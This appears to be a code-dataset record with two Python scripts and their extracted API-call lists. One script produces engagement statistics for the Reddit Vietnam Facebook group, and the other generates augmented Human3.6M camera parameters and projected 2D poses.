grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False)
for i in range(Nrow*Ncol):
subreddit = listTopSubs[i]
imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["post_id"], cmap="Reds", aspect="auto")
grid[i].set_title(subreddit, fontsize=20)
grid[i].set_aspect("auto")
grid[i].set_xlabel("Thứ")
grid[i].set_ylabel("Giờ")
grid[i].tick_params(axis="both", labelsize=12)
grid[i].grid(False)
grid.cbar_axes[0].colorbar(imTemp)
grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek)
fig.suptitle("Số post trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24)
plt.show()
del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp
#%%
######################################################
# statistics of likes of posts
print("Tổng số like: {:d}.".format(df["likes_count"].sum()))
print("Số like trung bình mỗi post: {:.2f}".format(df["likes_count"].mean()))
print("Số like cao nhất: {:d}".format(df["likes_count"].max()))
print("Bài nhiều like nhất: https://www.facebook.com/groups/redditvietnam/permalink/{}/".format(df.loc[df["likes_count"].idxmax()]["post_raw_id"]))
#likescountQuantiles = [.1, .25, .5, .75, .9, .99]
#for i in likescountQuantiles:
# print("{:.0%} bài có trên {:.0f} like.".format(1 - i, df["likes_count"].quantile(i)))
likescountMarkpoints = [100, 300, 500, 1000, 2000, 4000, 6000, 8000]
for i in likescountMarkpoints:
p = (df["likes_count"] >= i).sum()
print("Có {:d} bài ({:.2%}) đạt {:d} like trở lên.".format(p, p / totalFiltered, i))
fig, ax = plt.subplots()
likescountBins = range(0, 4000, 100)
df.hist(column="likes_count", grid=True, xlabelsize=14, ylabelsize=14, bins=likescountBins, ax=ax)
plt.title("Phân bố số like")
plt.xlabel("Số like")
plt.ylabel("Số bài viết")
plt.show()
del likescountMarkpoints, i, p, fig, ax, likescountBins
#%%
######################################################
# estimate distribution
sc = 500
reducedLikescount = df["likes_count"].copy() / sc
l = np.arange(0, 4000 / sc, 100 / (sc * 2))
param = stats.lognorm.fit(reducedLikescount)
pdfFitted = stats.lognorm.pdf(l, param[0], param[1], param[2])
fig = plt.figure()
plt.hist(reducedLikescount, bins=l, density=True)
plt.plot(l, pdfFitted, "r-")
plt.title("Ước lượng phân bố")
plt.xlabel("Số bài viết (đơn vị: {:d} bài)".format(sc))
plt.ylabel("Mật độ")
kstest = stats.kstest(reducedLikescount, 'lognorm', param)
plt.text(7, 0.5, "Model: lognorm\nShape = {:f}\nLoc = {:f}\nScale = {:f}\nKS-test:\nD = {:f}\np-value: {:f}".format(param[0], param[1], param[2], kstest.statistic, kstest.pvalue), fontsize=16)
plt.show()
del sc, reducedLikescount, l, param, pdfFitted, fig, kstest
#%%
######################################################
# statistics of translators
print("Tổng số dịch giả: {:d}".format(translators.size))
print("Mỗi dịch giả trung bình dịch {:.0f} bài.".format(totalFiltered / translators.size))
print("Dịch giả chăm chỉ nhất: {} (https://facebook.com/{}) với {} bài.".format(translators.loc[translatorsStats[('post_id', 'size')].idxmax()]["user_name"], translatorsStats[('post_id', 'size')].idxmax(), translatorsStats[('post_id', 'size')].max()))
print("Dịch giả dễ thương nhất: {} (https://facebook.com/{}) với tổng cộng {} like.".format(translators.loc[translatorsStats[('likes_count', 'sum')].idxmax()]["user_name"], translatorsStats[('likes_count', 'sum')].idxmax(), translatorsStats[('likes_count', 'sum')].max()))
print("Dịch giả hay được cưng yêu nhất: {} (https://facebook.com/{}) với trung bình {:.0f} like mỗi bài.".format(translators.loc[translatorsStats[('likes_count', 'mean')].idxmax()]["user_name"], translatorsStats[('likes_count', 'mean')].idxmax(), translatorsStats[('likes_count', 'mean')].max()))
postscountMarkpoints = [10, 20, 50, 100, 200]
for i in postscountMarkpoints:
p = (translatorsStats[("post_id", "size")] >= i).sum()
print("{:d} dịch giả ({:.2%}) có {:d} bài dịch trở lên.".format(p, p / translators.size, i))
del postscountMarkpoints, i, p
#%%
######################################################
# reddit posts verification
patternStr = r"https?://www\.reddit\.com/r/\w+/comments/(\w{1,6})/|https?://redd\.it/(\w{1,6})"
dfLinks = df["message"].str.extractall(patternStr)
dfLinksList = dfLinks.groupby(level=0)[0].apply(list) + dfLinks.groupby(level=0)[1].apply(list)
dfLinksListCount = dfLinksList.apply(lambda x: len(set([y for y in x if str(y) != 'nan'])))
multilinksSubmissionCount = (dfLinksListCount > 1).sum()
print("Số bài dịch có 2 link reddit trở lên trong bài là {:d}, chiếm {:.2%} tổng số bài.".format(multilinksSubmissionCount, multilinksSubmissionCount / totalFiltered))
del patternStr, dfLinks, dfLinksList, dfLinksListCount, multilinksSubmissionCount
#%%
######################################################
# ratio of karma and comments on submissions
meanKarma, meanCommentsCount = df[["r_score", "r_num_comments"]].mean()
print("Karma trung bình: {:.0f}.".format(meanKarma))
print("Số bình luận trung bình: {:.0f}.".format(meanCommentsCount))
print("Tỉ lệ Karma trên bình luận: {:.2f}.".format(meanKarma / meanCommentsCount))
del meanKarma, meanCommentsCount
#%%
######################################################
# choice of submission and interest reception
dfChoices = df[["r", "r_score", "likes_count", "created_time", "r_created_utc"]].copy()
dfChoices["delta"] = dfChoices["created_time"] - dfChoices["r_created_utc"]
# minor filter
irr = (dfChoices["delta"].dt.days < 0).sum()
print("{:d} bài có delta < 0, chiếm {:.2%} tổng số.".format(irr, irr / totalFiltered))
dfChoices.drop(dfChoices[dfChoices["delta"].dt.days < 0].index, inplace=True)
# convert delta to days in float
dfChoices["days_f"] = dfChoices["delta"] / np.timedelta64(1, "D")
# general stats
print("Khoảng cách xa nhất: {}. Link: https://www.facebook.com/groups/redditvietnam/permalink/{}.".format(dfChoices["delta"].max(), df.loc[dfChoices["delta"].idxmax()]["post_raw_id"]))
delays = [1, 7, 14, 30, 90, 180, 360, 720, 1080, 1800]
sampleSize = len(dfChoices.index)
for i in delays:
p = (dfChoices["days_f"] >= i).sum()
print("{:d} submission ({:.2%}) được dịch sau {:d} ngày.".format(p, p / sampleSize, i))
# distribution of delays
fig1, ax1 = plt.subplots()
bins = np.arange(0, 3500, 100)
ax1.hist(dfChoices["days_f"], bins=bins, rwidth=0.8)
ax1.set_title("Bao lâu submission mới được dịch?")
ax1.set_xlabel("Số ngày")
ax1.set_ylabel("Số bài")
fig1.show()
# distribution of delays, karma and likes
fig2, ax2 = plt.subplots()
g2 = ax2.scatter(dfChoices["r_score"].values, dfChoices["days_f"].values, c=dfChoices["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7)
ax2.set_title("Tương tác của submission trên Reddit và RedditVN")
ax2.set_xlabel("Karma trên Reddit", fontsize=16)
ax2.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)")
fig2.colorbar(g2, ax=ax2)
fig2.show()
# cropped distribution of delays, karma and likes
def plotCrop(rScoreCrop, daysFCrop):
dfChoicesCrop = dfChoices[(dfChoices["r_score"] < rScoreCrop) & (dfChoices["days_f"] < daysFCrop)]
fig3, ax3 = plt.subplots()
g3 = ax3.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["days_f"].values, c=dfChoicesCrop["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7)
ax3.set_title("Tương tác của submission trên Reddit và RedditVN")
ax3.set_xlabel("Karma trên Reddit")
ax3.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)")
fig3.colorbar(g3, ax=ax3)
fig3.show()
# distribution of karma and likes
fig4 = plt.figure()
ax4 = fig4.add_subplot(121)
ax4.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".")
ax4.set_title("So sánh karma và like")
ax4.set_xlabel("Karma trên Reddit")
ax4.set_ylabel("Like trên Facebook")
ax5 = fig4.add_subplot(122)
ax5.scatter(dfChoicesCrop["days_f"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".")
ax5.set_title("So sánh độ trễ và like")
ax5.set_xlabel("Độ trễ")
ax5.set_ylabel("Like trên Facebook")
fig4.show()
plotCrop(100000, 1200)
plotCrop(100000, 7)
plotCrop(100000, 1)
del irr, dfChoices, delays, sampleSize, i, p, fig1, ax1, bins, fig2, ax2, g2
|
[
"matplotlib.pyplot.title",
"pandas.read_csv",
"matplotlib.pyplot.figure",
"numpy.arange",
"pandas.Grouper",
"matplotlib.pyplot.xlabel",
"scipy.stats.lognorm.pdf",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.set_cmap",
"matplotlib.pyplot.subplots",
"scipy.stats.kstest",
"numpy.size",
"matplotlib.pyplot.show",
"math.ceil",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.barh",
"scipy.stats.lognorm.fit",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"pandas.crosstab",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.plot",
"numpy.timedelta64",
"mpl_toolkits.axes_grid1.AxesGrid"
] |
[((598, 686), 'pandas.read_csv', 'pd.read_csv', (['infile'], {'encoding': '"""utf-8"""', 'index_col': 'None', 'header': '(0)', 'lineterminator': '"""\n"""'}), "(infile, encoding='utf-8', index_col=None, header=0,\n lineterminator='\\n')\n", (609, 686), True, 'import pandas as pd\n'), ((1883, 1926), 'pandas.crosstab', 'pd.crosstab', ([], {'index': "df['r']", 'columns': '"""count"""'}), "(index=df['r'], columns='count')\n", (1894, 1926), True, 'import pandas as pd\n'), ((2351, 2429), 'math.ceil', 'math.ceil', (["((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)"], {}), "((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)\n", (2360, 2429), False, 'import math\n'), ((4142, 4154), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4152, 4154), True, 'import matplotlib.pyplot as plt\n'), ((4155, 4197), 'matplotlib.pyplot.title', 'plt.title', (['"""Thống kê tổng số post và like"""'], {}), "('Thống kê tổng số post và like')\n", (4164, 4197), True, 'import matplotlib.pyplot as plt\n'), ((4689, 4734), 'matplotlib.pyplot.legend', 'plt.legend', (['handles', 'labels'], {'loc': '"""upper left"""'}), "(handles, labels, loc='upper left')\n", (4699, 4734), True, 'import matplotlib.pyplot as plt\n'), ((4735, 4745), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4743, 4745), True, 'import matplotlib.pyplot as plt\n'), ((5783, 5795), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (5792, 5795), True, 'import numpy as np\n'), ((5807, 5821), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5819, 5821), True, 'import matplotlib.pyplot as plt\n'), ((5822, 5848), 'matplotlib.pyplot.barh', 'plt.barh', (['y', "rTop['count']"], {}), "(y, rTop['count'])\n", (5830, 5848), True, 'import matplotlib.pyplot as plt\n'), ((5849, 5897), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit nhiều bài dịch nhất"""'], {}), "('Những Subreddit nhiều bài dịch nhất')\n", (5858, 5897), True, 'import matplotlib.pyplot as plt\n'), ((5898, 5928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số bài được dịch"""'], {}), "('Số bài được dịch')\n", (5908, 5928), True, 'import matplotlib.pyplot as plt\n'), ((6120, 6130), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6128, 6130), True, 'import matplotlib.pyplot as plt\n'), ((6260, 6273), 'numpy.arange', 'np.arange', (['Ni'], {}), '(Ni)\n', (6269, 6273), True, 'import numpy as np\n'), ((6358, 6402), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit được chú ý nhất"""'], {}), "('Những Subreddit được chú ý nhất')\n", (6367, 6402), True, 'import matplotlib.pyplot as plt\n'), ((6403, 6445), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tổng số cảm xúc và bình luận"""'], {}), "('Tổng số cảm xúc và bình luận')\n", (6413, 6445), True, 'import matplotlib.pyplot as plt\n'), ((6488, 6502), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (6498, 6502), True, 'import matplotlib.pyplot as plt\n'), ((8174, 8188), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8186, 8188), True, 'import matplotlib.pyplot as plt\n'), ((8189, 8218), 'matplotlib.pyplot.set_cmap', 'plt.set_cmap', (['"""nipy_spectral"""'], {}), "('nipy_spectral')\n", (8201, 8218), True, 'import matplotlib.pyplot as plt\n'), ((8400, 8447), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài dịch mỗi sub theo thời gian"""'], {}), "('Số bài dịch mỗi sub theo thời gian')\n", (8409, 8447), True, 'import matplotlib.pyplot as plt\n'), ((8448, 8462), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (8458, 8462), True, 'import matplotlib.pyplot as plt\n'), ((8463, 8477), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (8473, 8477), True, 'import matplotlib.pyplot as plt\n'), ((8510, 8520), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8518, 8520), True, 'import matplotlib.pyplot as plt\n'), ((8825, 8839), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8837, 8839), True, 'import matplotlib.pyplot as plt\n'), ((9015, 9057), 'matplotlib.pyplot.title', 'plt.title', (['"""Like trung bình theo giờ đăng"""'], {}), "('Like trung bình theo giờ đăng')\n", (9024, 9057), True, 'import matplotlib.pyplot as plt\n'), ((9058, 9075), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9068, 9075), True, 'import matplotlib.pyplot as plt\n'), ((9076, 9093), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9086, 9093), True, 'import matplotlib.pyplot as plt\n'), ((9094, 9117), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9106, 9117), True, 'import matplotlib.pyplot as plt\n'), ((9118, 9128), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9126, 9128), True, 'import matplotlib.pyplot as plt\n'), ((9407, 9421), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (9419, 9421), True, 'import matplotlib.pyplot as plt\n'), ((9597, 9641), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài trung bình theo giờ đăng"""'], {}), "('Số bài trung bình theo giờ đăng')\n", (9606, 9641), True, 'import matplotlib.pyplot as plt\n'), ((9642, 9659), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9652, 9659), True, 'import matplotlib.pyplot as plt\n'), ((9660, 9677), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9670, 9677), True, 'import matplotlib.pyplot as plt\n'), ((9678, 9701), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9690, 9701), True, 'import matplotlib.pyplot as plt\n'), ((9702, 9712), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9710, 9712), True, 'import matplotlib.pyplot as plt\n'), ((9940, 9952), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9950, 9952), True, 'import matplotlib.pyplot as plt\n'), ((9960, 10129), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', cbar_pad=0.1,\n aspect=False)\n", (9968, 10129), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((10766, 10776), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10774, 10776), True, 'import matplotlib.pyplot as plt\n'), ((11035, 11047), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (11045, 11047), True, 'import matplotlib.pyplot as plt\n'), ((11055, 11224), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', cbar_pad=0.1,\n aspect=False)\n", (11063, 11224), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((11860, 11870), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11868, 11870), True, 'import matplotlib.pyplot as plt\n'), ((12796, 12810), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (12808, 12810), True, 'import matplotlib.pyplot as plt\n'), ((12947, 12975), 'matplotlib.pyplot.title', 'plt.title', (['"""Phân bố số like"""'], {}), "('Phân bố số like')\n", (12956, 12975), True, 'import matplotlib.pyplot as plt\n'), ((12976, 12997), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số like"""'], {}), "('Số like')\n", (12986, 12997), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13023), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Số bài viết"""'], {}), "('Số bài viết')\n", (13008, 13023), True, 'import matplotlib.pyplot as plt\n'), ((13024, 13034), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13032, 13034), True, 'import matplotlib.pyplot as plt\n'), ((13239, 13278), 'numpy.arange', 'np.arange', (['(0)', '(4000 / sc)', '(100 / (sc * 2))'], {}), '(0, 4000 / sc, 100 / (sc * 2))\n', (13248, 13278), True, 'import numpy as np\n'), ((13287, 13323), 'scipy.stats.lognorm.fit', 'stats.lognorm.fit', (['reducedLikescount'], {}), '(reducedLikescount)\n', (13304, 13323), False, 'from scipy import stats\n'), ((13336, 13386), 'scipy.stats.lognorm.pdf', 'stats.lognorm.pdf', (['l', 'param[0]', 'param[1]', 'param[2]'], {}), '(l, param[0], param[1], param[2])\n', (13353, 13386), False, 'from scipy import stats\n'), ((13394, 13406), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (13404, 13406), True, 'import matplotlib.pyplot as plt\n'), ((13407, 13456), 'matplotlib.pyplot.hist', 'plt.hist', (['reducedLikescount'], {'bins': 'l', 'density': '(True)'}), '(reducedLikescount, bins=l, density=True)\n', (13415, 13456), True, 'import matplotlib.pyplot as plt\n'), ((13457, 13485), 'matplotlib.pyplot.plot', 'plt.plot', (['l', 'pdfFitted', '"""r-"""'], {}), "(l, pdfFitted, 'r-')\n", (13465, 13485), True, 'import matplotlib.pyplot as plt\n'), ((13486, 13516), 'matplotlib.pyplot.title', 'plt.title', (['"""Ước lượng phân bố"""'], {}), "('Ước lượng phân bố')\n", (13495, 13516), True, 'import matplotlib.pyplot as plt\n'), ((13573, 13593), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mật độ"""'], {}), "('Mật độ')\n", (13583, 13593), True, 'import matplotlib.pyplot as plt\n'), ((13603, 13652), 'scipy.stats.kstest', 'stats.kstest', (['reducedLikescount', '"""lognorm"""', 'param'], {}), "(reducedLikescount, 'lognorm', param)\n", (13615, 13652), False, 'from scipy import stats\n'), ((13846, 13856), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13854, 13856), True, 'import matplotlib.pyplot as plt\n'), ((17459, 17473), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17471, 17473), True, 'import matplotlib.pyplot as plt\n'), ((17481, 17504), 'numpy.arange', 'np.arange', (['(0)', '(3500)', '(100)'], {}), '(0, 3500, 100)\n', (17490, 17504), True, 'import numpy as np\n'), ((17727, 17741), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17739, 17741), True, 'import matplotlib.pyplot as plt\n'), ((16958, 16980), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (16972, 16980), True, 'import numpy as np\n'), ((18336, 18350), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (18348, 18350), True, 'import matplotlib.pyplot as plt\n'), ((18815, 18827), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18825, 18827), True, 'import matplotlib.pyplot as plt\n'), ((2469, 2484), 'numpy.size', 'np.size', (['series'], {}), '(series)\n', (2476, 2484), True, 'import numpy as np\n'), ((3958, 4002), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time_utc"""'}), "(freq='M', key='created_time_utc')\n", (3968, 4002), True, 'import pandas as pd\n'), ((8039, 8079), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time"""'}), "(freq='M', key='created_time')\n", (8049, 8079), True, 'import pandas as pd\n'), ((1168, 1245), 'pandas.to_datetime', 'pd.to_datetime', (["df['created_time']"], {'format': '"""%Y-%m-%dT%H:%M:%S.000Z"""', 'utc': '(True)'}), "(df['created_time'], format='%Y-%m-%dT%H:%M:%S.000Z', utc=True)\n", (1182, 1245), True, 'import pandas as pd\n'), ((1300, 1355), 'pandas.to_datetime', 'pd.to_datetime', (["df['r_created_utc']"], {'unit': '"""s"""', 'utc': '(True)'}), "(df['r_created_utc'], unit='s', utc=True)\n", (1314, 1355), True, 'import pandas as pd\n')]
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.camera.camera import CameraInfoPacket, catesian2homogenous
import ipdb
import copy
import json
import numpy as np
from camera_augmentation import h36m_cameras_intrinsic_params
from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs
from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame
H36M_KPT_IDX = [0, 1, 2, 3, 6, 7, 8, 12, 13, 14, 15, 17, 18, 19, 25, 26, 27]
RES_W, RES_H = 1000, 1000
AXIS_X, AXIS_Y, AXIS_Z = [1, 0, 0], [0, 1, 0], [0, 0, 1]
TRAIN_SUBJECTS = ['S1', 'S5', 'S6', 'S7', 'S8']
TEST_SUBJECTS = ['S9', 'S11']
IDX_TO_CAMERA = {
0: '54138969',
1: '55011271',
2: '58860488',
3: '60457274'
}
if __name__ == '__main__':
FILE_TO_3D_POSE = '/ssd/yzhan/data/benchmark/3D/h36m/annotations/gt/data_3d_h36m.npz'
PATH_TO_OUTPUT = '/ssd/ray3d/camera.intrinsic'
SUBJECT = 'S1'
YAW = 0
TRANSLATION = 2.0
PITCH = 0
CENTER_POINT = [0, 0, 1.8]
FOCAL_LENGTH_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist()
CENTER_POINT_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist()
cam_idx = 1 # '55011271'
camera_info = init_camera_h36m()
camera_pose = get_camera_pose(camera_info)
pose_3d = np.load(FILE_TO_3D_POSE, allow_pickle=True)['positions_3d'].item()
selected_cam = copy.deepcopy(camera_info[SUBJECT][cam_idx])
Rw2c = selected_cam.Rw2c
Tw2c = selected_cam.Tw2c
t = np.array(CENTER_POINT).reshape(3, 1)
# translation
Tw2c_translation_aumented = camera_translation(Tw2c, t, TRANSLATION)
# rotation
yaw = convertdegree2euler(YAW)
Rw2c_rotation_augmented, Tw2c_rotation_augmented = rotate_camera(Rw2c, Tw2c_translation_aumented, t,
np.array(AXIS_Z), yaw)
# pitch
pitch = convertdegree2euler(PITCH)
camera_position = - np.dot(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented)
axis = np.array([-camera_position[1][0], camera_position[0][0], 0])
Rw2c_pitch_augmented, Tw2c_pitch_augmented = rotate_camera(Rw2c_rotation_augmented, Tw2c_rotation_augmented,
t, axis, pitch)
camera_position = - np.dot(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented)
# change the focal length of intrinsic
for f_bais in FOCAL_LENGTH_BAIS_RANGE:
for c_bias in CENTER_POINT_BAIS_RANGE:
K, dist_coeff = get_intrinsic(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias, cy_bias=c_bias)
camera_augmented = CameraInfoPacket(
P=None, K=K, R=Rw2c_pitch_augmented, t=Tw2c_pitch_augmented, dist_coeff=dist_coeff
)
# sanity check
invalid = False
pose_2d = {}
for sbj in pose_3d.keys():
pose_2d.setdefault(sbj, dict())
for act in pose_3d[sbj].keys():
pose_2d[sbj].setdefault(act, list())
kpt_3d = pose_3d[sbj][act][:, H36M_KPT_IDX]
kpt_3d_hom = catesian2homogenous(kpt_3d)
kpt_2d = camera_augmented.project(kpt_3d_hom)
pose_2d[sbj][act].append(kpt_2d)
if not check_in_frame(kpt_2d, RES_W, RES_H):
invalid = True
break
if invalid:
break
if invalid:
del pose_2d
continue
print('\tcam_idx:{}, FBAIS: {}, CBAIS: {}'.format(cam_idx, f_bais, c_bias))
CAMERA_PARAM_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('json'))
POSE_2D_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('npz'))
mkdirs(CAMERA_PARAM_PATH)
mkdirs(POSE_2D_PATH)
cameras_params = []
camera_param = {}
camera_param['id'] = h36m_cameras_intrinsic_params[cam_idx]['id']
camera_param['center'] = [camera_augmented.K[0, 2], camera_augmented.K[1, 2]]
camera_param['focal_length'] = [camera_augmented.K[0, 0], camera_augmented.K[1, 1]]
camera_param['radial_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['radial_distortion']
camera_param['tangential_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['tangential_distortion']
camera_param['res_w'] = h36m_cameras_intrinsic_params[cam_idx]['res_w']
camera_param['res_h'] = h36m_cameras_intrinsic_params[cam_idx]['res_h']
camera_param['azimuth'] = h36m_cameras_intrinsic_params[cam_idx]['azimuth']
camera_param['R'] = Rw2c_pitch_augmented.tolist()
camera_param['translation'] = Tw2c_pitch_augmented.tolist()
# save camera parameter
CAMERA_FILENAME = os.path.join(CAMERA_PARAM_PATH,
'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.json'.format(
TRANSLATION, YAW,
PITCH, cam_idx, f_bais, c_bias))
with open(CAMERA_FILENAME, 'w') as file_obj:
json.dump([camera_param], file_obj, indent=4)
# save projected 2d pose
POSE2D_FILENAME = os.path.join(POSE_2D_PATH,
'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.npz'.format(
TRANSLATION, YAW,
PITCH, cam_idx, f_bais, c_bias))
METADATA = {
'layout': 'h36m_aug',
'num_joints': 17,
'keypoints_symmetry': [[4, 5, 6, 11, 12, 13], [1, 2, 3, 14, 15, 16]]
}
np.savez(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d)
del pose_2d
|
[
"camera_augmentation.get_intrinsic",
"json.dump",
"copy.deepcopy",
"numpy.load",
"numpy.savez",
"lib.camera.camera.catesian2homogenous",
"os.path.dirname",
"camera_augmentation.rotate_camera",
"camera_augmentation.check_in_frame",
"camera_augmentation.camera_translation",
"lib.camera.camera.CameraInfoPacket",
"numpy.array",
"numpy.arange",
"numpy.dot",
"camera_augmentation.convertdegree2euler",
"camera_augmentation.get_camera_pose",
"camera_augmentation.init_camera_h36m",
"camera_augmentation.mkdirs"
] |
[((1249, 1267), 'camera_augmentation.init_camera_h36m', 'init_camera_h36m', ([], {}), '()\n', (1265, 1267), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1286, 1314), 'camera_augmentation.get_camera_pose', 'get_camera_pose', (['camera_info'], {}), '(camera_info)\n', (1301, 1314), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1416, 1460), 'copy.deepcopy', 'copy.deepcopy', (['camera_info[SUBJECT][cam_idx]'], {}), '(camera_info[SUBJECT][cam_idx])\n', (1429, 1460), False, 'import copy\n'), ((1615, 1655), 'camera_augmentation.camera_translation', 'camera_translation', (['Tw2c', 't', 'TRANSLATION'], {}), '(Tw2c, t, TRANSLATION)\n', (1633, 1655), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1682, 1706), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['YAW'], {}), '(YAW)\n', (1701, 1706), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((1929, 1955), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['PITCH'], {}), '(PITCH)\n', (1948, 1955), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2051, 2111), 'numpy.array', 'np.array', (['[-camera_position[1][0], camera_position[0][0], 0]'], {}), '([-camera_position[1][0], camera_position[0][0], 0])\n', (2059, 2111), True, 'import numpy as np\n'), ((2161, 2240), 'camera_augmentation.rotate_camera', 'rotate_camera', (['Rw2c_rotation_augmented', 'Tw2c_rotation_augmented', 't', 'axis', 'pitch'], {}), '(Rw2c_rotation_augmented, Tw2c_rotation_augmented, t, axis, 